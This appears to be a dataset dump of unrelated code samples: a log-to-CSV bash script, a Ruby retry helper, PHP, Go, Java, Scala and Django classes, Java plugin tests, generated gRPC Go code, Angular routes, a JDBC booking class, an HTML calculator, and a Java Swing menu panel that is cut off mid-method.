text
stringlengths 1
1.05M
|
|---|
#!/bin/bash
#
# Usage:
#
# $ scripts/make-csv.sh path/to/nanopub-monitor.log > nanopub-monitor.csv
#
cat $1 \
| grep " ch.tkuhn.nanopub.monitor.ServerData - Test result: " \
| sed -r 's/^\[INFO\] ([^ ]*) .* Test result: ([^ ]*) ([^ ]*) ([^ ]*)( ([^ ]*))?$/\1,\2,\3,\4,\6/'
|
# frozen_string_literal: true
module GithubAuthentication
module Retriable
def with_retries(*exceptions, max_attempts: 4, sleep_between_attempts: 0.1, exponential_backoff: true)
attempt = 1
previous_failure = nil
begin
return_value = yield(attempt, previous_failure)
rescue *exceptions => exception
raise unless attempt < max_attempts
sleep_after_attempt(
attempt: attempt,
base_sleep_time: sleep_between_attempts,
exponential_backoff: exponential_backoff
)
attempt += 1
previous_failure = exception
retry
else
return_value
end
end
private
def sleep_after_attempt(attempt:, base_sleep_time:, exponential_backoff:)
return unless base_sleep_time > 0
time_to_sleep = if exponential_backoff
calculate_exponential_backoff(attempt: attempt, base_sleep_time: base_sleep_time)
else
base_sleep_time
end
Kernel.sleep(time_to_sleep)
end
def calculate_exponential_backoff(attempt:, base_sleep_time:)
# Double the max sleep time for every attempt (exponential backoff).
# Randomize sleep time for more optimal request distribution.
lower_bound = Float(base_sleep_time)
upper_bound = lower_bound * (2 << (attempt - 2))
Kernel.rand(lower_bound..upper_bound)
end
end
end
|
class ResponseBuilder {
private $response = [
'code' => 200,
'status' => 'success',
'data' => null,
'url' => null
];
public function code($code) {
$this->response['code'] = $code;
return $this;
}
public function status($status) {
$this->response['status'] = $status;
return $this;
}
public function data($data) {
$this->response['data'] = $data;
return $this;
}
public function url($url) {
$this->response['url'] = $url;
return $this;
}
public function redirect() {
header("Location: " . $this->response['url']);
exit;
}
public function handleException($e, $repository) {
$this->response['message'] = $e->getMessage();
$this->response['code'] = 400;
$this->response['status'] = 'error';
$this->response['url'] = guard_url('blog/blog/' . $repository->getRouteKey());
$this->redirect();
}
}
|
package itunes
// URLTrack a track representing a network stream
type URLTrack struct {
Track
Address string // the URL for this track
}
|
<gh_stars>1-10
package org.galaxyproject.dockstore_galaxy_interface.language;
import com.google.common.io.Resources;
import com.google.gson.Gson;
import com.google.gson.GsonBuilder;
import com.google.gson.reflect.TypeToken;
import io.dockstore.common.VersionTypeValidation;
import io.dockstore.language.CompleteLanguageInterface;
import io.dockstore.language.MinimalLanguageInterface;
import io.dockstore.language.RecommendedLanguageInterface;
import java.io.File;
import java.io.IOException;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.regex.Matcher;
import org.apache.commons.io.FileUtils;
import org.apache.commons.lang3.tuple.Pair;
import org.junit.Assert;
import org.junit.Test;
public class GalaxyWorkflowLanguagePluginTest {
public static final String REPO_ID_1 = "jmchilton/galaxy-workflow-dockstore-example-1";
public static final String REPO_FORMAT_2 = "https://raw.githubusercontent.com/" + REPO_ID_1;
public static final String REPO_ID_2 = "mvdbeek/galaxy-workflow-dockstore-example-2";
public static final String REPO_NATIVE = "https://raw.githubusercontent.com/" + REPO_ID_2;
public static final String EXAMPLE_FILENAME_1 = "Dockstore.gxwf.yml";
public static final String EXAMPLE_FILENAME_1_PATH = "/" + EXAMPLE_FILENAME_1;
public static final String EXAMPLE_FILENAME_2 = "Dockstore.gxwf.yaml";
public static final String EXAMPLE_FILENAME_2_PATH = "/" + EXAMPLE_FILENAME_2;
public static final String EXAMPLE_FILENAME_NATIVE = "Dockstore.ga";
public static final String EXAMPLE_FILENAME_NATIVE_PATH = "/" + EXAMPLE_FILENAME_NATIVE;
public static final String CURRENT_BRANCH = "master";
@Test
public void testFormat2WorkflowParsing() {
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
final HttpFileReader reader = new HttpFileReader(REPO_FORMAT_2);
final String initialPath = EXAMPLE_FILENAME_1_PATH;
final String contents = reader.readFile(EXAMPLE_FILENAME_1);
final Map<String, Pair<String, MinimalLanguageInterface.GenericFileType>> fileMap =
plugin.indexWorkflowFiles(initialPath, contents, reader);
Assert.assertEquals(1, fileMap.size());
final Pair<String, MinimalLanguageInterface.GenericFileType> discoveredFile =
fileMap.get("/Dockstore.gxwf-test.yml");
Assert.assertEquals(
discoveredFile.getRight(), MinimalLanguageInterface.GenericFileType.TEST_PARAMETER_FILE);
final RecommendedLanguageInterface.WorkflowMetadata metadata =
plugin.parseWorkflowForMetadata(initialPath, contents, fileMap);
// We don't track these currently, but we could pull out the CWL parsing and mimic that.
Assert.assertNull(metadata.getAuthor());
Assert.assertNull(metadata.getEmail());
// We have name and annotation - not sure if this should just be "<name>"", or "<name>.
// <annotation>", or
// "<name>/n<annotation>".
// There is a doc for this workflow, use that for the description
Assert.assertEquals("This is the documentation for the workflow.", metadata.getDescription());
// Test validation stubs...
final VersionTypeValidation wfValidation =
plugin.validateWorkflowSet(initialPath, contents, fileMap);
Assert.assertTrue(wfValidation.isValid());
final VersionTypeValidation testValidation = plugin.validateTestParameterSet(fileMap);
Assert.assertTrue(testValidation.isValid());
// No validation messages because everything is fine...
Assert.assertTrue(wfValidation.getMessage().isEmpty());
final Map<String, Object> cytoscapeElements =
plugin.loadCytoscapeElements(initialPath, contents, fileMap);
// do a sanity check for a valid cytoscape JSON
// http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json
Assert.assertTrue(
cytoscapeElements.containsKey("nodes") && cytoscapeElements.containsKey("edges"));
final List<CompleteLanguageInterface.RowData> rowData =
plugin.generateToolsTable(initialPath, contents, fileMap);
Assert.assertFalse(rowData.isEmpty());
}
@Test
public void testNativeWorkflowParsing() {
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
final HttpFileReader reader = new HttpFileReader(REPO_NATIVE);
final String initialPath = EXAMPLE_FILENAME_NATIVE_PATH;
final String contents = reader.readFile(EXAMPLE_FILENAME_NATIVE);
final Map<String, Pair<String, MinimalLanguageInterface.GenericFileType>> fileMap =
plugin.indexWorkflowFiles(initialPath, contents, reader);
Assert.assertEquals(1, fileMap.size());
final Pair<String, MinimalLanguageInterface.GenericFileType> discoveredFile =
fileMap.get("/Dockstore-test.yml");
Assert.assertEquals(
discoveredFile.getRight(), MinimalLanguageInterface.GenericFileType.TEST_PARAMETER_FILE);
final RecommendedLanguageInterface.WorkflowMetadata metadata =
plugin.parseWorkflowForMetadata(initialPath, contents, fileMap);
// We don't track these currently - especially with native format.
Assert.assertNull(metadata.getAuthor());
Assert.assertNull(metadata.getEmail());
Assert.assertEquals("This is the documentation for the workflow.", metadata.getDescription());
final VersionTypeValidation wfValidation =
plugin.validateWorkflowSet(initialPath, contents, fileMap);
Assert.assertTrue(wfValidation.isValid());
// No validation messages because everything is fine...
Assert.assertTrue(wfValidation.getMessage().isEmpty());
final Map<String, Object> cytoscapeElements =
plugin.loadCytoscapeElements(initialPath, contents, fileMap);
// do a sanity check for a valid cytoscape JSON
// http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json
Assert.assertTrue(
cytoscapeElements.containsKey("nodes") && cytoscapeElements.containsKey("edges"));
final List<CompleteLanguageInterface.RowData> rowData =
plugin.generateToolsTable(initialPath, contents, fileMap);
Assert.assertFalse(rowData.isEmpty());
}
@Test
public void testValidationIssues() {
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
final ResourceFileReader reader = new ResourceFileReader("invalid_report_ga");
final String initialPath = "missing_markdown.ga";
final String contents = reader.readFile(initialPath);
final Map<String, Pair<String, MinimalLanguageInterface.GenericFileType>> fileMap =
plugin.indexWorkflowFiles(initialPath, contents, reader);
Assert.assertEquals(0, fileMap.size());
final VersionTypeValidation wfValidation =
plugin.validateWorkflowSet(initialPath, contents, fileMap);
Assert.assertFalse(wfValidation.isValid());
final Map<String, String> messages = wfValidation.getMessage();
Assert.assertTrue(messages.containsKey(initialPath));
final String validationProblem = messages.get(initialPath);
Assert.assertTrue(validationProblem.indexOf("markdown") > 0);
}
@Test
public void testTwoValidationIssues() {
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
final ResourceFileReader reader = new ResourceFileReader("invalid_report_ga");
final String initialPath = "two_validation_errors.ga";
final String contents = reader.readFile(initialPath);
final Map<String, Pair<String, MinimalLanguageInterface.GenericFileType>> fileMap =
plugin.indexWorkflowFiles(initialPath, contents, reader);
Assert.assertEquals(0, fileMap.size());
final VersionTypeValidation wfValidation =
plugin.validateWorkflowSet(initialPath, contents, fileMap);
Assert.assertFalse(wfValidation.isValid());
final Map<String, String> messages = wfValidation.getMessage();
final String validationProblem = messages.get(initialPath);
Assert.assertTrue(validationProblem.contains("- .. ERROR"));
Assert.assertTrue(validationProblem.contains("- .. WARNING"));
}
@Test
public void testInitialPathPattern() {
// TODO: This doesn't seem to be called by Dockstore anywhere - is that right?
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
Matcher m = plugin.initialPathPattern().matcher(EXAMPLE_FILENAME_1_PATH);
Assert.assertTrue("File name matches for initial path pattern", m.matches());
m = plugin.initialPathPattern().matcher(EXAMPLE_FILENAME_2_PATH);
Assert.assertTrue("File name matches for initial path pattern", m.matches());
m = plugin.initialPathPattern().matcher(EXAMPLE_FILENAME_NATIVE_PATH);
Assert.assertTrue("File name matches for initial path pattern (native workflows)", m.matches());
m = plugin.initialPathPattern().matcher("/Dockerstore.cwl");
Assert.assertFalse(m.matches());
m = plugin.initialPathPattern().matcher("/Dockerstore.nf");
Assert.assertFalse(m.matches());
}
abstract static class URLFileReader implements MinimalLanguageInterface.FileReader {
// URL to repo
protected final String repo;
// extracted ID
protected final Optional<String> id;
URLFileReader(final String repo) {
this.repo = repo;
final String[] split = repo.split("/");
if (split.length >= 2) {
id = Optional.of(split[split.length - 2] + "/" + split[split.length - 1]);
} else {
id = Optional.empty();
}
}
protected abstract URL getUrl(final String path) throws IOException;
@Override
public String readFile(String path) {
try {
if (path.startsWith("/")) {
path = path.substring(1);
}
URL url = this.getUrl(path);
return Resources.toString(url, StandardCharsets.UTF_8);
} catch (IOException e) {
throw new RuntimeException(e);
}
}
@Override
public List<String> listFiles(String pathToDirectory) {
if (id.isEmpty()) {
return new ArrayList<>();
}
Gson gson = new GsonBuilder().create();
try {
final String fileContent =
FileUtils.readFileToString(
new File("src/test/resources/" + this.id.get() + "/listing.json"));
return gson.fromJson(
fileContent, TypeToken.getParameterized(List.class, String.class).getType());
} catch (IOException e) {
throw new RuntimeException("test failed to read directory listing");
}
}
}
static class ResourceFileReader extends URLFileReader {
ResourceFileReader(final String repo) {
super(repo);
}
@Override
protected URL getUrl(String path) throws IOException {
final String classPath = "repos/" + this.repo + "/" + path;
final URL url = GalaxyWorkflowLanguagePluginTest.class.getResource(classPath);
if (url == null) {
throw new IOException("No such file " + classPath);
}
return url;
}
}
static class HttpFileReader extends URLFileReader {
HttpFileReader(final String repo) {
super(repo);
}
@Override
protected URL getUrl(final String path) throws IOException {
return new URL(this.repo + "/" + CURRENT_BRANCH + "/" + path);
}
}
}
|
package ai.lum.odinson.state
import ai.lum.odinson.utils.TestUtils.OdinsonTest
class TestMockState extends OdinsonTest {
val docGummy = getDocument("becky-gummy-bears-v2")
val eeGummy = extractorEngineWithSpecificState(docGummy, "mock")
val eeGummyMemory = extractorEngineWithSpecificState(docGummy, "memory")
"MockState" should "return mentions" in {
val rules = """
|rules:
| - name: gummy-rule
| label: Gummy
| type: basic
| priority: 1
| pattern: |
| gummy
|
| - name: eating-rule
| label: Consumption
| type: event
| priority: 2
| pattern: |
| trigger = [lemma=eat]
| subject: ^NP = >nsubj []
| object: ^NP = >dobj []
|
| - name: nomatch-rule
| label: GummyBear
| type: event
| priority: 2
| pattern: |
| trigger = bears
| arg: Gummy = >amod
""".stripMargin
val extractors = eeGummy.compileRuleString(rules)
val mentions = eeGummy.extractMentions(extractors).toArray
// "gummy" from first rule and the main event with both args in second
mentions should have size (4)
getMentionsWithLabel(mentions, "GummyBear") should have size (0)
}
"MemoryState" should "return mentions" in {
val rules = """
|rules:
| - name: gummy-rule
| label: Bear
| type: basic
| priority: 1
| pattern: |
| gummy
|
| - name: eating-rule
| label: Consumption
| type: event
| priority: 2
| pattern: |
| trigger = [lemma=eat]
| subject: ^NP = >nsubj []
| object: ^NP = >dobj []
|
| - name: nomatch-rule
| label: Gummy
| type: event
| priority: 2
| pattern: |
| trigger = bears
| arg: Bear = >amod
""".stripMargin
val extractors = eeGummyMemory.ruleReader.compileRuleString(rules)
val mentions = eeGummyMemory.extractMentions(extractors).toArray
// the 3 main extractions + 2 promoted args
mentions should have size (5)
getMentionsWithLabel(mentions, "Gummy") should have size (1)
}
}
|
public static int findMax(int num1, int num2) {
if (num1 > num2) {
return num1;
}
return num2;
}
|
<filename>tutos/src/tools/schemas/careers.js
import { schema } from 'normalizr'
export const career = new schema.Entity(
'careers',
)
export const careers = new schema.Array(career)
|
// Code generated by protoc-gen-go-grpc. DO NOT EDIT.
package testdata
import (
context "context"
grpc "google.golang.org/grpc"
codes "google.golang.org/grpc/codes"
status "google.golang.org/grpc/status"
)
// This is a compile-time assertion to ensure that this generated file
// is compatible with the grpc package it is being compiled against.
// Requires gRPC-Go v1.32.0 or later.
const _ = grpc.SupportPackageIsVersion7
// TestClient is the client API for Test service.
//
// For semantics around ctx use and closing/ending streaming RPCs, please refer to https://pkg.go.dev/google.golang.org/grpc/?tab=doc#ClientConn.NewStream.
type TestClient interface {
StreamOutput(ctx context.Context, in *StreamOutputRequest, opts ...grpc.CallOption) (Test_StreamOutputClient, error)
}
type testClient struct {
cc grpc.ClientConnInterface
}
func NewTestClient(cc grpc.ClientConnInterface) TestClient {
return &testClient{cc}
}
func (c *testClient) StreamOutput(ctx context.Context, in *StreamOutputRequest, opts ...grpc.CallOption) (Test_StreamOutputClient, error) {
stream, err := c.cc.NewStream(ctx, &Test_ServiceDesc.Streams[0], "/test.chunk.Test/StreamOutput", opts...)
if err != nil {
return nil, err
}
x := &testStreamOutputClient{stream}
if err := x.ClientStream.SendMsg(in); err != nil {
return nil, err
}
if err := x.ClientStream.CloseSend(); err != nil {
return nil, err
}
return x, nil
}
type Test_StreamOutputClient interface {
Recv() (*StreamOutputResponse, error)
grpc.ClientStream
}
type testStreamOutputClient struct {
grpc.ClientStream
}
func (x *testStreamOutputClient) Recv() (*StreamOutputResponse, error) {
m := new(StreamOutputResponse)
if err := x.ClientStream.RecvMsg(m); err != nil {
return nil, err
}
return m, nil
}
// TestServer is the server API for Test service.
// All implementations must embed UnimplementedTestServer
// for forward compatibility
type TestServer interface {
StreamOutput(*StreamOutputRequest, Test_StreamOutputServer) error
mustEmbedUnimplementedTestServer()
}
// UnimplementedTestServer must be embedded to have forward compatible implementations.
type UnimplementedTestServer struct {
}
func (UnimplementedTestServer) StreamOutput(*StreamOutputRequest, Test_StreamOutputServer) error {
return status.Errorf(codes.Unimplemented, "method StreamOutput not implemented")
}
func (UnimplementedTestServer) mustEmbedUnimplementedTestServer() {}
// UnsafeTestServer may be embedded to opt out of forward compatibility for this service.
// Use of this interface is not recommended, as added methods to TestServer will
// result in compilation errors.
type UnsafeTestServer interface {
mustEmbedUnimplementedTestServer()
}
func RegisterTestServer(s grpc.ServiceRegistrar, srv TestServer) {
s.RegisterService(&Test_ServiceDesc, srv)
}
func _Test_StreamOutput_Handler(srv interface{}, stream grpc.ServerStream) error {
m := new(StreamOutputRequest)
if err := stream.RecvMsg(m); err != nil {
return err
}
return srv.(TestServer).StreamOutput(m, &testStreamOutputServer{stream})
}
type Test_StreamOutputServer interface {
Send(*StreamOutputResponse) error
grpc.ServerStream
}
type testStreamOutputServer struct {
grpc.ServerStream
}
func (x *testStreamOutputServer) Send(m *StreamOutputResponse) error {
return x.ServerStream.SendMsg(m)
}
// Test_ServiceDesc is the grpc.ServiceDesc for Test service.
// It's only intended for direct use with grpc.RegisterService,
// and not to be introspected or modified (even as a copy)
var Test_ServiceDesc = grpc.ServiceDesc{
ServiceName: "test.chunk.Test",
HandlerType: (*TestServer)(nil),
Methods: []grpc.MethodDesc{},
Streams: []grpc.StreamDesc{
{
StreamName: "StreamOutput",
Handler: _Test_StreamOutput_Handler,
ServerStreams: true,
},
},
Metadata: "helper/chunk/testdata/test.proto",
}
|
<reponame>stephenjelfs/react-dnd-tutorial-typescript-mobx
declare module "react-dnd-html5-backend" {
export default class HTML5Backend implements __ReactDnd.Backend {}
}
|
package com.ctrip.persistence.service;
import com.ctrip.persistence.entity.*;
import com.ctrip.persistence.enums.MLFlowStatus;
import com.ctrip.persistence.pojo.DataResult;
import com.ctrip.persistence.pojo.Result;
import java.util.List;
import java.util.Map;
/**
* Created by juntao on 2/14/16.
* 算法开发 service
*
* @author 张峻滔
*/
public interface MLFlowService {
Map<String, Object> getConf();
void saveOrUpdateJobFlow(MLFlow flow);
void saveFlow(MLFlow flow);
Map<String, Object> getConf(Long flowId);
Map<String, Object> getUserConf(Long ownerId);
List<MLFlow> getAllFlow();
List<MLFlowHistory> getFlowHistory(Long id);
Result deleteMLJob(Long id);
MLFlow getById(Long id);
MLFlow getByName(String name);
Result stopMLJob(Long id);
/*正常结束*/
Result finishRunningMLJob(Long id);
Result getElement(Long id);
/*保存自定义*/
void saveCusElementTpl(ElementTpl tpl);
Result updateElementStatus(Long id, MLFlowStatus status);
/*从zeppelin中获取 node book 并持久化*/
DataResult<ZeppelinParagraph> saveReadyZeppelinNote(ZeppelinParagraph paragraph);
Result updateZeppelinParagraph(Long elementId, ZeppelinParagraph paragraph);
Result getZeppelinParagraph(Long elementId);
List<ElementHistory> findByMlFlowId(Long id);
String getNameById(Long id);
Long getOwnerIdByMlFlowId(Long id);
}
|
package com.packtpub.designpatterns.structural;
import java.sql.Connection;
import java.sql.Date;
import java.sql.PreparedStatement;
import java.util.UUID;
import com.packtpub.designpatterns.creational.ConnectionManager;
public class CabBooking {
ConnectionManager instance = null;
public CabBooking() {
instance = ConnectionManager.getInstance();
}
public int BookCab(String guestName, String fromLocation,
String toLocation,Date bookingDate, String cabNo) {
int count = 0;
try {
String bookingId = UUID.randomUUID().toString();
Connection conn = instance.getConnection();
String sql = "insert into CabBooking values(?,?,?,?,?,?)";
PreparedStatement pstmt = conn.prepareStatement(sql);
pstmt.setString(1, bookingId);
pstmt.setString(2, guestName);
pstmt.setString(3, fromLocation);
pstmt.setString(4, toLocation);
pstmt.setDate(5, bookingDate);
pstmt.setString(6, cabNo);
count = pstmt.executeUpdate();
pstmt.close();
conn.close();
System.out.println("Cab Booking for " + guestName
+ " done.\n");
System.out.println("Booking Details :\nFrom : "
+ fromLocation + ",Destination: " + toLocation
+ "Booking Date : " + bookingDate + "Cab No : " + cabNo + "\n");
} catch (Exception e) {
e.printStackTrace();
}
return count;
}
}
|
from django import forms
from .models import PBSMMEpisode
class PBSMMEpisodeCreateForm(forms.ModelForm):
"""
This overrides the Admin form when creating an Episode (by hand).
Usually Episodes are "created" when ingesting a parental Season
(or a grand-parental Show).
"""
class Meta:
model = PBSMMEpisode
fields = ('slug', 'season')
class PBSMMEpisodeEditForm(forms.ModelForm):
class Meta:
model = PBSMMEpisode
exclude = []
|
<filename>src/app/app.routing.ts
import { ModuleWithProviders } from '@angular/core';
import { Routes, RouterModule } from '@angular/router';
import { WelcomeComponent } from './welcome/welcome.component';
import { GameOverComponent } from './game-over/game-over.component';
import { SuccessComponent } from './success/success.component';
const appRoutes: Routes = [
{
path: '',
component: WelcomeComponent
},
{
path: 'game-over',
component: GameOverComponent
},
{
path: 'success',
component: SuccessComponent
}
];
export const routing: ModuleWithProviders = RouterModule.forRoot(appRoutes);
|
package org.nem.core.model.ncc;
import org.nem.core.model.namespace.*;
import org.nem.core.model.primitive.BlockHeight;
public class NamespaceMetaDataPairTest extends AbstractMetaDataPairTest<Namespace, DefaultMetaData> {
public NamespaceMetaDataPairTest() {
super(account -> new Namespace(new NamespaceId("foo"), account, new BlockHeight(17)), id -> new DefaultMetaData((long) id),
NamespaceMetaDataPair::new, NamespaceMetaDataPair::new, namespace -> namespace.getOwner().getAddress(),
metaData -> metaData.getId().intValue());
}
}
|
<html>
<head>
<title>Calculator</title>
<script>
function calculate() {
let a = document.getElementById('a').value;
let b = document.getElementById('b').value;
document.getElementById('output').innerHTML = Number(a) + Number(b);
}
</script>
</head>
<body>
<input type="text" id="a"/>
<input type="text" id="b"/>
<button onclick="calculate()">Calculate</button>
<div id="output"></div>
</body>
</html>
|
package com.github.jinahya.datagokr.api.b090041_.lunphinfoservice.client.message.adapter;
import java.time.Month;
import java.time.format.DateTimeFormatter;
public class MmMonthAdapter extends FormattedTemporalAdapter<Month> {
public static final DateTimeFormatter MONTH_MM_FORMATTER = DateTimeFormatter.ofPattern("MM");
public MmMonthAdapter() {
super(Month.class, MONTH_MM_FORMATTER, Month::from);
}
}
|
package io.quarkuscoffeeshop.counter.domain;
public enum LineItemStatus {
PLACED, IN_PROGRESS, FULFILLED
}
|
package de.hswhameln.typetogether.client.gui;
import java.awt.BorderLayout;
import java.awt.Color;
import java.awt.Dimension;
import java.awt.FlowLayout;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.beans.PropertyChangeEvent;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.util.stream.Collectors;
import javax.swing.BorderFactory;
import javax.swing.Box;
import javax.swing.BoxLayout;
import javax.swing.JButton;
import javax.swing.JLabel;
import javax.swing.JList;
import javax.swing.JOptionPane;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JTextField;
import javax.swing.SwingConstants;
import de.hswhameln.typetogether.client.businesslogic.ClientUser;
import de.hswhameln.typetogether.client.runtime.PropertyChangeManager;
import de.hswhameln.typetogether.client.runtime.SessionStorage;
import de.hswhameln.typetogether.networking.LocalDocument;
import de.hswhameln.typetogether.networking.api.Document;
import de.hswhameln.typetogether.networking.api.Lobby;
import de.hswhameln.typetogether.networking.api.exceptions.InvalidDocumentIdException;
import de.hswhameln.typetogether.networking.util.ExceptionHandler;
import de.hswhameln.typetogether.networking.util.LoggerFactory;
public class MenuPanel extends AbstractPanel {
private final Logger logger = LoggerFactory.getLogger(this);
private JPanel leftSide;
private JPanel rightSide;
private JTextField documentNameField;
private JScrollPane tablePane;
private JList<String> documentTable;
private String[] tableData;
private ClientUser user;
private final Lobby lobby;
private final PropertyChangeManager propertyChangeManager;
private JLabel username;
public MenuPanel(MainWindow window, SessionStorage sessionStorage) {
super(window, sessionStorage);
this.lobby = sessionStorage.getLobby();
this.setUser(sessionStorage.getCurrentUser());
this.propertyChangeManager = new PropertyChangeManager();
sessionStorage.addPropertyChangeListener(this.propertyChangeManager);
this.propertyChangeManager.onPropertyChange(SessionStorage.CURRENT_USER, this::currentUserChanged);
this.setLayout(new BoxLayout(this, BoxLayout.PAGE_AXIS));
this.setSize(ViewProperties.DEFAULT_WIDTH, ViewProperties.DEFAULT_HEIGHT);
this.createGrid();
this.createLeftSide();
this.createRightSide();
}
@Override
public void initialize() {
this.tableData = this.sessionStorage
.getLobby()
.getDocumentIds()
.stream()
.sorted()
.toArray(String[]::new);
this.documentTable.setListData(this.tableData);
}
private void createRightSide() {
BoxLayout layout = new BoxLayout(this.rightSide, BoxLayout.Y_AXIS);
this.rightSide.setLayout(layout);
JPanel gridPanel = new JPanel(new FlowLayout());
gridPanel.setBackground(ViewProperties.BACKGROUND_COLOR);
JButton refresh = new JButton("Aktualisieren");
refresh.setBackground(ViewProperties.CONTRAST_COLOR);
refresh.setForeground(ViewProperties.BACKGROUND_COLOR);
refresh.setFont(ViewProperties.SUBHEADLINE_FONT);
refresh.setBorder(BorderFactory.createEmptyBorder());
refresh.addActionListener(e -> this.onRefresh());
this.rightSide.add(refresh);
JLabel headlineLabel = new JLabel("Verfügbare Dokumente");
Dimension sizeTitle = new Dimension(200, 70);
headlineLabel.setFont(ViewProperties.SUBHEADLINE_FONT);
headlineLabel.setMaximumSize(sizeTitle);
gridPanel.add(headlineLabel);
gridPanel.add(refresh);
gridPanel.setMaximumSize(new Dimension(ViewProperties.DEFAULT_WIDTH / 2 - 6, 50));
this.rightSide.add(gridPanel);
this.rightSide.add(Box.createVerticalStrut(5));
this.tableData = this.sessionStorage.getLobby().getDocumentIds().stream().sorted().toArray(String[]::new);
this.documentTable = new JList<>(tableData);
this.documentTable.setVisible(true);
this.documentTable.addMouseListener(new MouseAdapter() {
@Override
public void mouseClicked(MouseEvent evt) {
JList<?> list = (JList<?>) evt.getSource();
if (evt.getClickCount() == 2) {
MenuPanel.this.documentNameField.setText((String) list.getSelectedValue());
MenuPanel.this.joinDocument();
}
}
});
this.documentTable.setFont(ViewProperties.EDITOR_FONT);
this.tablePane = new JScrollPane(this.documentTable);
this.tablePane.setVisible(true);
this.rightSide.add(this.tablePane);
}
private void createGrid() {
JPanel headline = new TypeTogetherPanel();
this.add(headline);
headline.setVisible(true);
headline.setBorder(BorderFactory.createEmptyBorder());
JPanel body = new JPanel();
BorderLayout layout = new BorderLayout();
body.setLayout(layout);
body.setVisible(true);
body.setBorder(BorderFactory.createEmptyBorder());
this.add(body);
this.leftSide = new JPanel();
Dimension size = new Dimension(ViewProperties.DEFAULT_WIDTH / 2 - 6, ViewProperties.DEFAULT_HEIGHT - ViewProperties.HEADLINE_HEIGHT);
this.leftSide.setSize(size);
this.leftSide.setPreferredSize(size);
this.leftSide.setVisible(true);
this.leftSide.setBorder(BorderFactory.createEmptyBorder());
this.leftSide.setBackground(ViewProperties.BACKGROUND_COLOR);
body.add(this.leftSide, BorderLayout.WEST);
this.rightSide = new JPanel();
this.rightSide.setSize(size);
this.rightSide.setPreferredSize(size);
this.rightSide.setVisible(true);
this.rightSide.setBorder(BorderFactory.createEmptyBorder());
this.rightSide.setBackground(ViewProperties.BACKGROUND_COLOR);
body.add(this.rightSide, BorderLayout.EAST);
}
private void createLeftSide() {
BoxLayout layout = new BoxLayout(this.leftSide, BoxLayout.Y_AXIS);
this.leftSide.setLayout(layout);
this.leftSide.add(Box.createVerticalStrut(150));
this.leftSide.add(Box.createVerticalStrut(100));
JLabel documentTitle = new JLabel("Name des Dokuments");
Dimension sizeTitle = new Dimension(500, 70);
documentTitle.setOpaque(true);
documentTitle.setMaximumSize(sizeTitle);
documentTitle.setHorizontalTextPosition(SwingConstants.LEFT);
documentTitle.setFont(ViewProperties.SUBHEADLINE_FONT);
documentTitle.setForeground(ViewProperties.FONT_COLOR);
documentTitle.setBackground(ViewProperties.BACKGROUND_COLOR);
documentTitle.setAlignmentX(CENTER_ALIGNMENT);
this.leftSide.add(documentTitle);
this.documentNameField = new JTextField(2);
this.documentNameField.setForeground(ViewProperties.FONT_COLOR);
this.documentNameField.setSize(500, 40);
this.documentNameField.setMaximumSize(new Dimension(500, 40));
this.documentNameField.setFont(ViewProperties.EDITOR_FONT);
this.documentNameField.setBorder(BorderFactory.createLineBorder(ViewProperties.FONT_COLOR, 1));
this.leftSide.add(this.documentNameField);
this.leftSide.add(Box.createRigidArea(new Dimension(500, 15)));
this.leftSide.add(this.createButtons(new Dimension(500, 50)));
this.leftSide.add(Box.createRigidArea(new Dimension(500, 70)));
this.username = new JLabel();
this.username.setOpaque(true);
this.username.setMaximumSize(new Dimension(500, 40));
this.username.setBackground(ViewProperties.BACKGROUND_COLOR);
this.username.setForeground(ViewProperties.FONT_COLOR);
this.username.setFont(ViewProperties.SUBHEADLINE_FONT);
this.username.setHorizontalTextPosition(SwingConstants.LEFT);
this.username.setAlignmentX(CENTER_ALIGNMENT);
this.leftSide.add(username);
}
private JPanel createButtons(Dimension panelSize) {
JPanel buttons = new JPanel();
buttons.setVisible(true);
buttons.setBackground(ViewProperties.BACKGROUND_COLOR);
buttons.setMaximumSize(panelSize);
buttons.setPreferredSize(panelSize);
buttons.setMinimumSize(panelSize);
buttons.setSize(panelSize);
FlowLayout flowLayout = new FlowLayout();
flowLayout.setVgap(0);
flowLayout.setHgap(0);
flowLayout.setAlignment(FlowLayout.LEFT);
buttons.setLayout(flowLayout);
Dimension buttonSize = new Dimension(150, 50);
JButton createDocumentButton = new JButton("Erstellen");
createDocumentButton.setFont(ViewProperties.SUBHEADLINE_FONT);
createDocumentButton.setForeground(ViewProperties.BACKGROUND_COLOR);
createDocumentButton.setBackground(ViewProperties.CONTRAST_COLOR);
createDocumentButton.setMinimumSize(buttonSize);
createDocumentButton.setMaximumSize(buttonSize);
createDocumentButton.setPreferredSize(buttonSize);
createDocumentButton.setSize(buttonSize);
createDocumentButton.setBorder(BorderFactory.createEmptyBorder());
createDocumentButton.addActionListener(a -> this.createDocument());
buttons.add(createDocumentButton);
buttons.add(Box.createHorizontalStrut(200));
JButton joinDocumentButton = new JButton("Beitreten");
joinDocumentButton.setFont(ViewProperties.SUBHEADLINE_FONT);
joinDocumentButton.setForeground(ViewProperties.BACKGROUND_COLOR);
joinDocumentButton.setBackground(ViewProperties.CONTRAST_COLOR);
joinDocumentButton.setMinimumSize(buttonSize);
joinDocumentButton.setMaximumSize(buttonSize);
joinDocumentButton.setPreferredSize(buttonSize);
joinDocumentButton.setSize(buttonSize);
joinDocumentButton.setBorder(BorderFactory.createEmptyBorder());
joinDocumentButton.addActionListener(a -> this.joinDocument());
buttons.add(joinDocumentButton);
return buttons;
}
private void currentUserChanged(PropertyChangeEvent propertyChangeEvent) {
